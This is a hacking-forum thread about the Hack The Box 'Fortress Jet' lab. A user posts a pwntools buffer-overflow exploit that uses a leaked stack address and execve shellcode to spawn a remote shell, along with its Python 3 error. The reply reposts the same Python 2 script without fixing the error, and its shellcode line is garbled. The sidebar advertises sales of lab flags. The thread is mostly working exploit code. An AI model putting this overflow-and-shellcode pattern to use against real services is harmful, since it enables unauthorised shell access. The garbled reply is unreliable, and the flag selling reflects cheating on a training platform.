TUTORIAL HTB Fortress Jet - help needed with leak exploit
by JaneHopkirk - November 26, 2021 at 12:02 AM
#1
Can anyone help with getting the reverse shell by exploiting the leak binary?

From the free shared writeup I used this:

from pwn import *
p=remote('10.13.37.10',60001)
p.recvuntil("Oops, I'm leaking! ")
leak=int(p.recvuntil("\n"),16)
print hex(leak)
p.recvuntil("> ")
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
buf=shellcode
buf+="\x90"*(72-len(shellcode))
buf+=p64(leak, endianness="little")
p.sendline(buf)
p.interactive()



But that was for python2, and on Kali with python3 you get this error:

Traceback (most recent call last):

  File "/root/htb/jet/leak2.py", line 10, in <module>
    buf+=p64(leak, endianness="little")
TypeError: can only concatenate str (not "bytes") to str
[*]Closed connection to 10.13.37.10 port 60001



I googled the shit out of it but can't figure out a working way to get a connection.

Can anyone help?
Reply
#2
hey !

from pwn import *
#p=process("./leak")
p=remote('10.13.37.10',60001)
p.recvuntil("Oops, I'm leaking! ")
leak=int(p.recvuntil("\n"),16)
print hex(leak)
p.recvuntil("> ")
# shellcode http://shell-storm.org/shellcode/files/s...de-806.php
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\
x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"buf=shellcode
buf+="\x90"*(72-len(shellcode))
buf+=p64(leak, endianness="little")
p.sendline(buf)
p.interactive()

just do:- python sploit.py
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING HTB Odyssey Endgame flags and Faraday Fortress flags mobile1 13 2,327 December 03, 2021 at 01:11 PM
Last Post: mobile1
TUTORIAL HTB Fortress - Faraday (Discussion) slrrrR 25 6,761 November 25, 2021 at 02:22 AM
Last Post: gambit1337
SELLING Sell Faraday Fortress flags mobile1 7 923 November 18, 2021 at 12:51 PM
Last Post: mobile1

 Users browsing this thread: 1 Guest(s)